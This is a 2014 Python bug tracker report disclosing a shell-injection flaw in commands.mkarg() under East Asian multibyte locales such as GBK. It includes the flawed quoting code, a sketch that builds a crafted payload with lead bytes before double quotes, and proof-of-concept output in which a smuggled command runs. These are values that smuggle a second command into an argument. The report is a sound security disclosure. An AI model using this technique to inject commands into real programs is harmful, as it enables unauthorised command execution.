[New-bugs-announce] [issue22187] commands.mkarg() buggy in East Asian locales

Jakub Wilk report at bugs.python.org
Tue Aug 12 20:13:05 CEST 2014


New submission from Jakub Wilk:

This is how shell quoting in commands.mkarg() is implemented:

def mkarg(x):
    if '\'' not in x:
        return ' \'' + x + '\''
    s = ' "'
    for c in x:
        if c in '\\$"`':
            s = s + '\\'
        s = s + c
    s = s + '"'
    return s

Unfortunately, this is not compatible with the way bash splits arguments in some locales.
The problem is that in a few East Asian encodings (at least BIG5, BIG5-HKSCS, GB18030, GBK), the byte 0x5C (backslash in ASCII) can be the second byte of a two-byte character, and bash apparently decodes the string before splitting it into arguments. A backslash that mkarg() inserts directly after such a lead byte is then read as part of that character and no longer escapes anything.
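
The byte-level ambiguity can be reproduced without a shell. What follows is only a minimal sketch, assuming Python's built-in gbk codec. mkarg_bytes is a hypothetical byte-string port of the function quoted above, and the payload is made up for illustration; it is not taken from test-mkargs.py.

```python
def mkarg_bytes(x):
    """Hypothetical byte-string port of the mkarg() logic quoted above."""
    if b"'" not in x:
        return b" '" + x + b"'"
    s = b' "'
    for i in range(len(x)):
        c = x[i:i + 1]          # one-byte slice, works on Python 2 and 3
        if c in b'\\$"`':
            s += b'\\'          # escape characters special inside "..."
        s += c
    return s + b'"'

# Made-up payload: the GBK lead byte 0x81 sits right before each double quote.
# The embedded single quotes force mkarg onto its double-quote code path.
payload = b"\x81\" ; echo 'INJECTED' ; \x81\""
quoted = mkarg_bytes(payload)

# Byte view (what mkarg intends): each payload '"' has a backslash before it.
bytes_has_escape = b'\\"' in quoted

# GBK view: every 0x81 0x5C pair decodes to a single two-byte character,
# so the escaping backslashes vanish and the '"' characters are left bare.
as_gbk = quoted.decode('gbk')
gbk_has_backslash = u'\\' in as_gbk

print(repr(quoted))
print(bytes_has_escape, gbk_has_backslash)
```

Read as GBK, the first double quote of the payload closes the quoted string that mkarg opened, which would leave the text between the two lead bytes outside any quoting.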

PoC:

$ sh --version | head -n1
GNU bash, version 4.3.22(1)-release (i486-pc-linux-gnu)

$ LC_ALL=C python test-mkargs.py
crw-rw-rw- 1 root root 1, 3 Aug 12 16:00 /dev/null
ls: cannot access " ; python -c 'import this' | grep . | shuf | head -n1 | cowsay -y ; ": No such file or directory

$ LC_ALL=zh_CN.GBK python test-mkargs.py
crw-rw-rw- 1 root root 1, 3 8月  12 16:00 /dev/null
ls: 无法访问乗: No such file or directory
 ________________________________
< Simple is better than complex. >
 --------------------------------
        \   ^__^
         \  (..)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
sh: 乗: 未找到命令
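
For contrast, a quoting scheme that never emits a backslash would not run into this particular ambiguity. The sketch below uses single quotes only, the same idea as shlex.quote() in Python 3. quote_single is a hypothetical name and the payload is made up; the report itself does not propose this or any other fix, and it does not establish whether such a scheme is robust in every locale.

```python
def quote_single(x):
    """Quote byte string x using single quotes only (hypothetical helper)."""
    # An embedded ' is written as '"'"' : close the single-quoted string,
    # emit a double-quoted single quote, then reopen the single quotes.
    return b" '" + x.replace(b"'", b"'\"'\"'") + b"'"

# Made-up payload with the GBK lead byte 0x81 before each double quote.
payload = b"\x81\" ; echo 'INJECTED' ; \x81\""
quoted = quote_single(payload)

# No backslash bytes are added, so no 0x5C can pair up with a lead byte.
added_backslashes = quoted.count(b'\\') - payload.count(b'\\')
print(repr(quoted))
print(added_backslashes)
```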

----------
components: Library (Lib)
files: test-mkargs.py
messages: 225235
nosy: jwilk
priority: normal
severity: normal
status: open
title: commands.mkarg() buggy in East Asian locales
type: security
versions: Python 2.7
Added file: http://bugs.python.org/file36359/test-mkargs.py

_______________________________________
Python tracker <report at bugs.python.org>
<http://bugs.python.org/issue22187>
_______________________________________